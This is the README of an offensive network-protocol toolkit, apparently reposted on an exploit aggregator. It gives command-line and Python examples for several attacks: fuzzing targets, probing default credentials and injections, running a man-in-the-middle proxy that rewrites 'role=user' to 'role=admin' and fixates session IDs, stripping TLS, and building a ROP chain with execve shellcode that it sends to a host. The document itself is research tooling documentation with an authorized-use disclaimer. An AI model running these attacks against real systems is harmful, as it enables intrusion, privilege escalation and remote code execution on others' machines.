Share
## https://sploitus.com/exploit?id=E07672B6-E349-5FE5-953E-0A86375F7597
# netproto_toolkit
Network protocol security research toolkit in Python, covering the full workflow from traffic capture through protocol fuzzing to exploit development and bug-bounty report generation.
Based on: **Attacking Network Protocols** by James Forshaw (No Starch Press)
> **AUTHORIZED USE ONLY** โ for ethical security research, bug bounty programs, and penetration testing engagements where explicit written authorization has been obtained.
---
## Modules
| File | Coverage | Key classes |
|------|----------|-------------|
| `netproto_exploit_toolkit.py` | Ch9โ10: core fuzzing & vuln probes | `RandomFuzzer`, `MutationFuzzer`, `TestCaseGenerator`, `AuthProber`, `InjectionProber`, `ExploitScaffold`, `CrashTriager`, `Reporter` |
| `netproto_protocol_modules.py` | Ch2โ3, Ch10: protocol DSL, capture, MITM | `Packet`, `FieldAwareFuzzer`, `PortForwardProxy`, `MITMProxy`, `HTTPModule`, `FTPModule`, `DNSModule`, `SMTPModule`, `GenericTLVModule` |
| `netproto_advanced.py` | Ch10 extensions: coverage fuzzing, recon, exploit dev, reporting | `CoverageGuidedFuzzer`, `EntropyAnalyzer`, `FieldBoundaryDetector`, `CaptureDiff`, `CyclicPattern`, `ROPGadgetScanner`, `ShellcodeHelper`, `ExploitBuilder`, `BugBountyReport` |
| `netproto.py` | Unified entry point | dispatches to `fuzz \| proto \| adv` |
---
## Requirements
Python 3.9+ โ no required third-party packages. All core functionality uses the standard library.
**Optional** โ install for full ROP gadget coverage in `ROPGadgetScanner`:
```
pip install capstone
```
---
## Quick start
```bash
git clone https://github.com/r3tr0xCTF/netproto_toolkit.git
cd netproto_toolkit
python3 netproto.py --help
```
---
## CLI reference
### `netproto fuzz` โ core fuzzing modes
```bash
# Random fuzzer (like cat /dev/urandom | nc host port)
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m random -n 1000
# Mutation fuzzer from a seed capture
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m mutation --seed-file captured.bin -n 500
# Structured test cases (integer overflows, injections, path traversal)
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m structured
# Default credential probe + user enumeration
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m authprobe
# Injection probes (SQLi, CMDi, format strings, path traversal)
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m inject
# PoC exploit scaffolds (stack overflow, integer overflow, auth bypass)
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m exploit
# Run every mode in sequence and save report
python3 netproto.py fuzz -t 192.168.1.100 -p 9999 -m full -o results/report
```
### `netproto proto` โ protocol-aware fuzzing & proxies
```bash
# HTTP fuzzer (paths, headers, methods)
python3 netproto.py proto http -t 192.168.1.100 -p 8080
# FTP fuzzer with authenticated session
python3 netproto.py proto ftp -t 192.168.1.100 -u anonymous -P anon@test.com
# DNS fuzzer (label lengths, compression loops, QTYPE boundaries, EDNS0)
python3 netproto.py proto dns -t 192.168.1.100
# SMTP envelope fuzzer
python3 netproto.py proto smtp -t 192.168.1.100 -p 25
# Passive capture proxy โ saves every packet as a seed file
python3 netproto.py proto proxy --listen 8888 --remote-host target.local --remote-port 9999
# Active MITM proxy โ inspect and modify traffic in both directions
python3 netproto.py proto mitm --listen 8888 --remote-host target.local --remote-port 9999
# MITM with a find/replace rule (e.g. downgrade an auth level)
python3 netproto.py proto mitm --listen 8888 --remote-host target.local --remote-port 9999 \
--find 'role=user' --replace 'role=admin' --direction C2S
# MITM with TLS stripping (self-signed cert generated automatically)
python3 netproto.py proto mitm --listen 443 --remote-host target.local --remote-port 443 \
--tls-client --tls-server --duration 120
```
### `netproto adv` โ advanced tools
```bash
# Coverage-guided fuzzer from captured seeds
python3 netproto.py adv covfuzz -t 192.168.1.100 -p 9000 --seed-dir /tmp/seeds --iters 5000
# Per-position entropy analysis โ reveals fixed fields vs dynamic data
python3 netproto.py adv entropy --seed-dir /tmp/seeds
# Field boundary detection + Packet DSL skeleton
python3 netproto.py adv recon --seed-dir /tmp/seeds --name MyProto
# Field boundary + capture diff classification
python3 netproto.py adv recon --seed-dir /tmp/seeds --name MyProto --diff
# ROP gadget scanner
python3 netproto.py adv rop --binary /path/to/target --base 0x400000
# Filter by mnemonic
python3 netproto.py adv rop --binary /path/to/target --find "pop rdi"
# De Bruijn cyclic pattern (for stack overflow offset discovery)
python3 netproto.py adv cyclic --length 2048 --output pattern.bin
# Find offset of a crash value in a previously generated pattern
python3 netproto.py adv cyclic --length 2048 --find 0x6161616261616163
# Generate a bug-bounty report from a saved session JSON
python3 netproto.py adv report --session results/report.json \
--program "Target App" --tester "Your Name" --output report.md
```
---
## Python API
### Protocol field DSL
```python
from netproto_protocol_modules import (
Packet, U8, U16BE, U32BE,
NulStrField, LenPrefixStrField, RawField, TLVField,
)
# Define a packet structure
login_pkt = Packet(
"LOGIN",
U8("tag", 0x01),
U16BE("total_len", 0),
LenPrefixStrField("username", ">H", b"admin"),
LenPrefixStrField("password", ">H", b"admin"),
)
# Build โ bytes
raw = login_pkt.build()
# Parse bytes back into fields
login_pkt.parse(raw)
print(login_pkt.get("username")) # b'admin'
# Generate every single-field mutation (keeps all other fields valid)
for field_name, variant_idx, mutated_bytes in login_pkt.field_mutations():
print(f"{field_name}[{variant_idx}]: {mutated_bytes.hex()}")
```
### Field-aware fuzzer
```python
from netproto_exploit_toolkit import NetClient, FuzzSession
from netproto_protocol_modules import FieldAwareFuzzer
client = NetClient("192.168.1.100", 9000)
session = FuzzSession(target="192.168.1.100", port=9000, protocol="MyProto")
fuzzer = FieldAwareFuzzer(client, login_pkt)
findings = fuzzer.run(session)
```
### Coverage-guided fuzzer
```python
from pathlib import Path
from netproto_advanced import CoverageGuidedFuzzer
seeds = [p.read_bytes() for p in Path("/tmp/seeds").glob("*.bin")]
fuzzer = CoverageGuidedFuzzer(client, seeds, max_corpus_size=500)
findings = fuzzer.run(session, max_iterations=5000)
print(fuzzer.coverage_summary())
```
### MITM proxy with packet-level hook
```python
import re
from netproto_protocol_modules import MITMProxy
proxy = MITMProxy("0.0.0.0", 8888, "target.local", 9999)
# Bytes find/replace rule
proxy.add_rule(b'"role":"user"', b'"role":"admin"', direction="C2S", label="privesc")
# Regex rule
proxy.add_rule(re.compile(rb"session_id=\w+"), b"session_id=AAAA", label="fixate")
# Arbitrary callback hook
def on_client(session, data):
print(f"[sess {session.session_id}] CโS {len(data)}B")
return data # return modified bytes or None to pass through unchanged
proxy.on_client_data = on_client
proxy.start()
```
### Exploit builder
```python
from netproto_advanced import CyclicPattern, ROPGadgetScanner, ShellcodeHelper, ExploitBuilder
# 1. Find the overflow offset
pattern = CyclicPattern.generate(2048)
offset = CyclicPattern.find_offset_int(pattern, 0x6161616261616163) # RIP from debugger
# 2. Scan the binary for gadgets
scanner = ROPGadgetScanner.from_file("/path/to/target", base_addr=0x400000)
pop_rdi = scanner.find("pop rdi")[0].offset
# 3. Assemble the payload
payload = (
ExploitBuilder(offset=offset)
.set_ret(pop_rdi)
.add_rop(0x601060) # address of /bin/sh string
.add_rop(0x400550) # address of system()
.set_nop_sled(16)
.set_shellcode(ShellcodeHelper.EXECVE_SH_X64)
.set_bad_bytes([0x00, 0x0a])
.note(f"offset={offset}, pop_rdi=0x{pop_rdi:x}")
)
print(payload.hexdump())
payload.send("192.168.1.100", 9999)
```
### Bug bounty report
```python
from netproto_advanced import BugBountyReport
report = BugBountyReport(
session=session,
program_name="Target Application",
target_url="https://target.example.com",
tester="Your Name",
)
report.print_summary()
report.save("report.md", fmt="markdown") # HackerOne / Bugcrowd ready
report.save("report.json", fmt="json") # machine-readable
```
---
## Protocol recon workflow
```
1. Capture seeds netproto proto proxy โ /tmp/seeds/*.bin
2. Analyse structure netproto adv entropy โ fixed vs dynamic bytes
3. Detect boundaries netproto adv recon โ skeleton Packet DSL
4. Refine DSL edit the generated Packet definition in Python
5. Field-aware fuzz FieldAwareFuzzer โ targeted mutations per field
6. Coverage fuzz CoverageGuidedFuzzer โ novel server paths via response signals
7. Triage crashes CrashTriager โ GDB script + ASan rebuild command
8. Report BugBountyReport โ CVSS v3.1, CWE, markdown / JSON
```
---
## Tests
```bash
python3 tests/test_netproto_toolkit.py
# 56 tests: 56 passed, 0 failed.
```
No network access required โ tests cover only pure-computation functions.
---
## License
For educational and authorized security research use only. See individual module headers for details.